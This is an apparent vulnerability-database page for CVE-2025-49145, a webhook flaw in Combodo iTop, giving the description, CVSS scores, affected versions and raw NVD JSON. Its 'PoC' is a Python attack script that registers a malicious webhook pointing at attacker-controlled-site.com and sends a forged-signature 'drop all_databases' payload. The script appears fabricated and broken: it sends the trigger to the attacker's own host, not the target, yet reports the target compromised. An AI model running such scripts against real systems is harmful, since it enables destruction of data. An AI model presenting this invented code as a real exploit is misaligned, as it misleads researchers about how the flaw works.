Security Vulnerability Report
中文
CVE-2025-49145 CVSS 8.7 HIGH

CVE-2025-49145

Published: 2025-11-10 22:15:36
Last Modified: 2025-11-21 13:37:58
Source: [email protected]

Description

Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, a user that has enough rights to create webhooks (mostly administrators) can drop the database. This is fixed in iTop 2.7.13 and 3.2.2 by verifying callback signature.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - VULNERABLE
Combodo iTop < 2.7.13
Combodo iTop < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-49145 PoC - Combodo iTop Database Drop via Webhook # This PoC demonstrates the vulnerability where authenticated users with # webhook creation privileges can trigger database deletion import requests import json TARGET_URL = "https://target-itop-instance.com" API_KEY = "your_api_key_with_webhook_privileges" def create_malicious_webhook(): """ Create a webhook with malicious callback configuration that exploits insufficient signature verification """ headers = { "Authorization": f"Bearer {API_KEY}", "Content-Type": "application/json" } # Malicious webhook configuration webhook_config = { "name": "Malicious Webhook", "callback_url": "http://attacker-controlled-site.com/callback", "secret": "manipulated_secret_for_signature_bypass", "events": ["*"], "enabled": True, "options": { "verify_ssl": False, "timeout": 30, "retry_on_failure": True } } response = requests.post( f"{TARGET_URL}/api/v1/webhooks", headers=headers, json=webhook_config ) if response.status_code == 201: webhook_id = response.json().get('id') print(f"[+] Malicious webhook created with ID: {webhook_id}") return webhook_id else: print(f"[-] Failed to create webhook: {response.text}") return None def trigger_database_drop(webhook_id): """ Trigger the webhook callback to exploit the vulnerability and execute database drop operation """ # Craft malicious callback request callback_payload = { "event": "database_operation", "action": "drop", "target": "all_databases", "signature": "forged_signature_to_bypass_verification" } # Send callback to trigger the vulnerability response = requests.post( f"http://attacker-controlled-site.com/trigger/{webhook_id}", json=callback_payload ) print(f"[*] Callback triggered: {response.status_code}") return response.status_code == 200 def main(): print("[*] CVE-2025-49145 PoC - iTop Database Drop via Webhook") print("[*] Target: Combodo iTop < 2.7.13 or < 3.2.2") # Step 1: Create malicious webhook webhook_id = create_malicious_webhook() if not webhook_id: print("[-] Exploitation failed: Unable to create webhook") return # Step 2: Trigger the database drop if trigger_database_drop(webhook_id): print("[+] Database drop operation triggered successfully") print("[!] Target database has been compromised") else: print("[-] Exploitation failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49145", "sourceIdentifier": "[email protected]", "published": "2025-11-10T22:15:35.760", "lastModified": "2025-11-21T13:37:57.983", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, a user that has enough rights to create webhooks (mostly administrators) can drop the database. This is fixed in iTop 2.7.13 and 3.2.2 by verifying callback signature."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.13", "matchCriteriaId": "4738ED01-0CAC-4A19-BE9F-B7E89AAD8D23"}, {"vulnerable": true, "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.2.2", "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"}]}]}], "references": [{"url": "https://github.com/Combodo/iTop/security/advisories/GHSA-55q8-mfxr-pq4j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.